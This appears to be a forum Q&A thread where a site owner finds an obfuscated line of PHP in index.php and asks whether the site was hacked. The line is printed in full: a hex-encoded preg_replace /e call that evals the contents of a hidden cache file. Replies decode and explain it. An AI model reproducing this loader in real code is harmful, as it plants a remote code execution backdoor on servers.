# Did my site get hacked?

Tags: php

I was randomly browsing a site on one of our servers, and I found this bit of code as the second line on index.php:

```
@preg_replace("\x24\50\x5b\136\x3c\135\x2b\51\x24\163\x69\145","\x65\166\x61\154\x28\47\x24\147\x63\155\x3d\67\x37\67\x37\61\x3b\47\x2e\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b\44\x67\143\x6d\75\x37\67\x37\67\x31\73","\x4c\62\x68\166\x62\127\x55\166\x59\62\x78\150\x63\63\x4e\160\x5a\155\x6b\166\x63\110\x56\151\x62\107\x6c\152\x58\62\x68\60\x62\127\x77\166\x62\107\x46\165\x5a\171\x39\152\x59\127\x4e\157\x5a\123\x38\165\x4a\124\x67\171\x4f\105\x55\154\x4d\104\x41\170\x4d\171\x56\103\x4f\105\x59\172\x4a\125\x4a\104\x4d\125\x49\154\x51\152\x49\171\x51\151\x55\60\x52\152\x55\63");
```

When I run it, I get:

```
Warning: file(/home/classifi/public_html/lang/cache/.%828E%0013%B8F3%BC1B%B22B%4F57): failed to open stream: No such file or directory
```

It looks like it's obfuscated to do something that it really shouldn't be doing. Can anyone explain to me how I can figure out what the intention was of this line of code? And whether or not my server was actually hacked?

What was the perpetrator trying to do? It is a site running NOAH CLASSIFIEDS script.

Comment: Sadly, yes. You need to fix the security holes.

Comment: Indeed it has, Are you running open source software on there? Like joomla? I would suggest you change your ftp passwords to start.

Comment: Thanks guys, but I'm trying to figure out what the hack does?

Answer (score 4, accepted):

that is an hexa-coded text if you want to see the decoded version then see this

[Decoded](http://ddecode.com/hexdecoder/?results=6bd8cf54b6607bf4ed6ca664bd488d09)

Comment: #hackersWithMalciousGoalsSuckBalls

Comment: Also the base64 in that code decodes into `/home/classifi/public_html/lang/cache/.%828E%0013%B8F3%BC1B%B22B%4F57`

Comment: Any idea why they would care about that cache file?

Comment: It's not really a cache file. The `.` prefix hides it and the contents are being eval'd. Cache directories are a common entry vector for attacks, especially on shared hosting since they are frequently given very broad permissions.